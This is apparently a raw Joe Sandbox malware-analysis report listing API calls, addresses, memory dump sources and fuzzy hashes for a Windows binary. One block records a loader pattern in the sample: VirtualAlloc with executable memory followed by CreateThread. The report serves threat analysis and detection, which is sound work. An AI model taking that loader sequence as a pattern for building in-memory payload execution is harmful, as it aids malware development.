                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor
                                                                            • String ID:
                                                                            • API String ID: 2325560087-0
                                                                            • Opcode ID: 309bd6d4a187569475443335c559eb4200c991bcf063f38d8679c13c911c3bee
                                                                            • Instruction ID: 051ad7201b85afc922786138c126b39be5c3c4349645cb14460a95c0aef791e2
                                                                            • Opcode Fuzzy Hash: 309bd6d4a187569475443335c559eb4200c991bcf063f38d8679c13c911c3bee
                                                                            • Instruction Fuzzy Hash: EF5181B1A00205CFEB15CFA9D8C27AABBF4FB48310F25842AD405EB750D379AA80CF50
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: da7514b08d6c523f9c908cf29cda49de920fd82585d7caba2db66c0edb6593ca
                                                                            • Instruction ID: db998b76770c8ee73406cb7ebe747c53f8c07e90c8febb469aac0f75523addbe
                                                                            • Opcode Fuzzy Hash: da7514b08d6c523f9c908cf29cda49de920fd82585d7caba2db66c0edb6593ca
                                                                            • Instruction Fuzzy Hash: C841AEB5804219AFDF20DF79CC89BAABBB9AF55304F1442D9E41DE3211DB359E848F20
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00147701
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 3736152602-0
                                                                            • Opcode ID: d137964d1949fd19435b309b32aa18975805a0f2ff54f65b0a3fe962a204d182
                                                                            • Instruction ID: 80ab08e1b066ae3992e75595e0e5aef0a741cd82a536ffdf75847c6c9d10b0b0
                                                                            • Opcode Fuzzy Hash: d137964d1949fd19435b309b32aa18975805a0f2ff54f65b0a3fe962a204d182
                                                                            • Instruction Fuzzy Hash: 2521D432608206ABDB289B24DD46B7A73ACEF14316F10007AF905C72A1EB34ED45C790
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • EnumSystemLocalesW.KERNEL32(0014745A,00000001,00000000,?,-00000050,?,00147A8B,00000000,?,?,?,00000055,?), ref: 001473A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: 9f5f00387ea92c8368637e764d2dc3eb2214eaf5f0032933acfcaaf0e4aa91af
                                                                            • Instruction ID: 716f7fa3852f7979a8346ca0fd85d41839b3d572a27a3e124c56150bbe1ff841
                                                                            • Opcode Fuzzy Hash: 9f5f00387ea92c8368637e764d2dc3eb2214eaf5f0032933acfcaaf0e4aa91af
                                                                            • Instruction Fuzzy Hash: D8110C3B2047015FDB189F39C89167ABB91FF80358B19882DE94787B90E371B943D740
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00147676,00000000,00000000,?), ref: 00147908
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 3736152602-0
                                                                            • Opcode ID: 8c4af11dcd8066f6c42cd3fc8bf818b659c5a99d7610c8c0c6fff1ed6e2e386a
                                                                            • Instruction ID: 0f437a3e1af18927f152e3b63822edc1fb2fdc847db5db63f626768a3ccc63ec
                                                                            • Opcode Fuzzy Hash: 8c4af11dcd8066f6c42cd3fc8bf818b659c5a99d7610c8c0c6fff1ed6e2e386a
                                                                            • Instruction Fuzzy Hash: C2F0A9366081116BDB285B24C805BBB7759EB40778F154465ED46A31D0DB74FE41C6D0
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • EnumSystemLocalesW.KERNEL32(001476AD,00000001,00000000,?,-00000050,?,00147A4F,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00147419
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: 390f669980dcb39daab2533fe14c56abdbd8660b59c6ff0834b8df75a90e1017
                                                                            • Instruction ID: 24a920a55ec7c9fea6c42b0e09534d7086a7fb8be2205a81c3bc6fbcd5804166
                                                                            • Opcode Fuzzy Hash: 390f669980dcb39daab2533fe14c56abdbd8660b59c6ff0834b8df75a90e1017
                                                                            • Instruction Fuzzy Hash: F1F0C2362043045FDB245F79A881A7A7B91EB81368F19842DF9058BAE0D7B19C42C750
                                                                            APIs
                                                                              • Part of subcall function 0013A8B5: EnterCriticalSection.KERNEL32(?,?,0013E968,?,00155700,00000008,0013EB2C,?,?,?), ref: 0013A8C4
                                                                            • EnumSystemLocalesW.KERNEL32(0013F012,00000001,00155780,0000000C,0013F441,00000000), ref: 0013F057
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                            • String ID:
                                                                            • API String ID: 1272433827-0
                                                                            • Opcode ID: 8bd53c104b87df7feeffe1139ebae08aac7e5d5db9ccc571d4fdf0fe89531bdd
                                                                            • Instruction ID: 35a08145e13743834002f373b193998e827f994cb00be82d502bc758694a57a2
                                                                            • Opcode Fuzzy Hash: 8bd53c104b87df7feeffe1139ebae08aac7e5d5db9ccc571d4fdf0fe89531bdd
                                                                            • Instruction Fuzzy Hash: 65F04F76A00200DFD704EFACE842B5C77F1FB48721F10402AF411DB6A1D7755941DB41
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • EnumSystemLocalesW.KERNEL32(00147242,00000001,00000000,?,?,00147AAD,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00147320
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: ef7a3646dea098f5ee6c4540ac0f9a9db2b048e6c8fd970e537d69dd01539a9a
                                                                            • Instruction ID: eb2c225c8cd4d6078a04d050895ad7e14bde29d2081c04b078be780543f584bc
                                                                            • Opcode Fuzzy Hash: ef7a3646dea098f5ee6c4540ac0f9a9db2b048e6c8fd970e537d69dd01539a9a
                                                                            • Instruction Fuzzy Hash: 7EF0E53A30020557CB149F35D855B6A7F94FFC1760F464459FE068B6A0C7719843D790
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0013D804,?,20001004,00000000,00000002,?,?,0013CE04), ref: 0013F579
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: 00d85351ae6db138c07d665bc03feafbbf2e1afd157c8d630a9be4da8d622b45
                                                                            • Instruction ID: fe0de6d9455aa6806484e4cb67ae91ead439932be15616326d07ad007aaa523f
                                                                            • Opcode Fuzzy Hash: 00d85351ae6db138c07d665bc03feafbbf2e1afd157c8d630a9be4da8d622b45
                                                                            • Instruction Fuzzy Hash: 69E04F35940118BBCF126F61EC05A9E7E1AEF54760F004025FD1566171CB318D62AAD4
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000510E,0013477F), ref: 00135107
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: e576b97a1c0449f1829f9c1b9d9d5f99ecc803e5709a040b1349669744a94196
                                                                            • Instruction ID: 55529a4f398e27ba9d365ed12b961389c999cb47a2b151e0af36e67b331b4be4
                                                                            • Opcode Fuzzy Hash: e576b97a1c0449f1829f9c1b9d9d5f99ecc803e5709a040b1349669744a94196
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            Similarity
                                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                            • String ID:
                                                                            • API String ID: 3471368781-0
                                                                            APIs
                                                                              • Part of subcall function 0013116F: __EH_prolog3_catch.LIBCMT ref: 00131176
                                                                              • Part of subcall function 0013116F: _strlen.LIBCMT ref: 00131188
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0014C29C
                                                                              • Part of subcall function 00131852: _strlen.LIBCMT ref: 0013186A
                                                                            • _strlen.LIBCMT ref: 0014C2B7
                                                                            • _strlen.LIBCMT ref: 0014C2CD
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0014C2EA
                                                                              • Part of subcall function 0014C20E: VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,0014C2FD), ref: 0014C222
                                                                              • Part of subcall function 0014C20E: CreateThread.KERNELBASE(00000000,00000000,00000188,00157018,00000000,00000000), ref: 0014C256
                                                                              • Part of subcall function 0014C20E: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,0014C2FD), ref: 0014C262
                                                                              • Part of subcall function 0014C20E: CloseHandle.KERNEL32(00000000,?,?,0014C2FD), ref: 0014C269
                                                                              • Part of subcall function 00131DFE: _Deallocate.LIBCONCRT ref: 00131E0D
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
                                                                            • String ID: Cons$Free$Madino Mino$kernel32.dll$ole
                                                                            • API String ID: 4115190924-2348686229
                                                                            APIs
                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00137F37
                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00138045
                                                                            • _UnwindNestedFrames.LIBCMT ref: 00138197
                                                                            • CallUnexpected.LIBVCRUNTIME ref: 001381B2
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                            • String ID: csm$csm$csm
                                                                            • API String ID: 2751267872-393685449
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3907804496
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(00B305D8,00B305D8,?,7FFFFFFF,?,00149DC9,00B305D8,00B305D8,?,00B305D8,?,?,?,?,00B305D8,?), ref: 00149B9F
                                                                            • __alloca_probe_16.LIBCMT ref: 00149C5A
                                                                            • __alloca_probe_16.LIBCMT ref: 00149CE9
                                                                            • __freea.LIBCMT ref: 00149D34
                                                                            • __freea.LIBCMT ref: 00149D3A
                                                                            • __freea.LIBCMT ref: 00149D70
                                                                            • __freea.LIBCMT ref: 00149D76
                                                                            • __freea.LIBCMT ref: 00149D86
                                                                            Similarity
                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                            • String ID:
                                                                            • API String ID: 127012223-0
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00134526
                                                                            • __alloca_probe_16.LIBCMT ref: 00134552
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00134591
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001345AE
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001345ED
                                                                            • __alloca_probe_16.LIBCMT ref: 0013460A
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013464C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0013466F
                                                                            Similarity
                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                            • String ID:
                                                                            • API String ID: 2040435927-0
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 001378E7
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 001378EF
                                                                            • _ValidateLocalCookies.LIBCMT ref: 00137978
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 001379A3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 001379F8
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 0013230E
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00132318
                                                                            • int.LIBCPMT ref: 0013232F
                                                                              • Part of subcall function 00132867: std::_Lockit::_Lockit.LIBCPMT ref: 00132878
                                                                              • Part of subcall function 00132867: std::_Lockit::~_Lockit.LIBCPMT ref: 00132892
                                                                            • codecvt.LIBCPMT ref: 00132352
                                                                            • std::_Facet_Register.LIBCPMT ref: 00132369
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00132389
                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00132396
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                            • String ID:
                                                                            • API String ID: 2133458128-0
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 001323A3
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001323AD
                                                                            • int.LIBCPMT ref: 001323C4
                                                                              • Part of subcall function 00132867: std::_Lockit::_Lockit.LIBCPMT ref: 00132878
                                                                              • Part of subcall function 00132867: std::_Lockit::~_Lockit.LIBCPMT ref: 00132892
                                                                            • ctype.LIBCPMT ref: 001323E7
                                                                            • std::_Facet_Register.LIBCPMT ref: 001323FE
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0013241E
                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0013242B
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                            • String ID:
                                                                            • API String ID: 2958136301-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,00137AA1,00136070,00135152), ref: 00137AB8
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00137AC6
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00137ADF
                                                                            • SetLastError.KERNEL32(00000000,00137AA1,00136070,00135152), ref: 00137B31
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C118BA38,?,?,00000000,0014B356,000000FF,?,0013C30F,?,?,0013C2E3,00000000), ref: 0013C3B4
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0013C3C6
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0014B356,000000FF,?,0013C30F,?,?,0013C2E3,00000000), ref: 0013C3E8
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 00133E19
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00133E24
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00133E92
                                                                              • Part of subcall function 00133F75: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00133F8D
                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 00133E3F
                                                                            • _Yarn.LIBCPMT ref: 00133E55
                                                                            Similarity
                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                            • String ID:
                                                                            • API String ID: 1088826258-0
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 001325AC
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001325B9
                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001325F6
                                                                              • Part of subcall function 00133F10: _Yarn.LIBCPMT ref: 00133F2F
                                                                              • Part of subcall function 00133F10: _Yarn.LIBCPMT ref: 00133F53
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                                                            • String ID: bad locale name
                                                                            • API String ID: 482894088-1405518554
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00155048,00000000,00000800,?,00138BA3,00000000,?,00000000,?,?,?,00138CCD,00000002,FlsGetValue,0014EC80,FlsGetValue), ref: 00138BFF
                                                                            • GetLastError.KERNEL32(?,00138BA3,00000000,?,00000000,?,?,?,00138CCD,00000002,FlsGetValue,0014EC80,FlsGetValue,00000000,?,00137B5D), ref: 00138C09
                                                                            • LoadLibraryExW.KERNEL32(00155048,00000000,00000000,?,00155048,?,?,?,001318ED,?,001318ED,?), ref: 00138C31
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID: api-ms-
                                                                            • API String ID: 3177248105-2084034818
                                                                            APIs
                                                                            • GetConsoleOutputCP.KERNEL32(C118BA38,00000000,00000000,00000000), ref: 0013FE31
                                                                              • Part of subcall function 00143E34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00142DC6,?,00000000,-00000008), ref: 00143EE0
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0014008C
                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001400D4
                                                                            • GetLastError.KERNEL32 ref: 00140177
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                            • String ID:
                                                                            • API String ID: 2112829910-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: AdjustPointer
                                                                            • String ID:
                                                                            • API String ID: 1740715915-0
                                                                            APIs
                                                                              • Part of subcall function 00143E34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00142DC6,?,00000000,-00000008), ref: 00143EE0
                                                                            • GetLastError.KERNEL32 ref: 001442B4
                                                                            • __dosmaperr.LIBCMT ref: 001442BB
                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 001442F5
                                                                            • __dosmaperr.LIBCMT ref: 001442FC
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1913693674-0
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 001451EE
                                                                              • Part of subcall function 00143E34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00142DC6,?,00000000,-00000008), ref: 00143EE0
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00145226
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00145246
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 158306478-0
                                                                            APIs
                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00148411,00000000,00000001,00000000,00000000,?,001401CB,00000000,00000000,00000000), ref: 0014962C
                                                                            • GetLastError.KERNEL32(?,00148411,00000000,00000001,00000000,00000000,?,001401CB,00000000,00000000,00000000,00000000,00000000,?,00140752,00000000), ref: 00149638
                                                                              • Part of subcall function 001495FE: CloseHandle.KERNEL32(FFFFFFFE,00149648,?,00148411,00000000,00000001,00000000,00000000,?,001401CB,00000000,00000000,00000000,00000000,00000000), ref: 0014960E
                                                                            • ___initconout.LIBCMT ref: 00149648
                                                                              • Part of subcall function 001495C0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001495EF,001483FE,00000000,?,001401CB,00000000,00000000,00000000,00000000), ref: 001495D3
                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00148411,00000000,00000001,00000000,00000000,?,001401CB,00000000,00000000,00000000,00000000), ref: 0014965D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
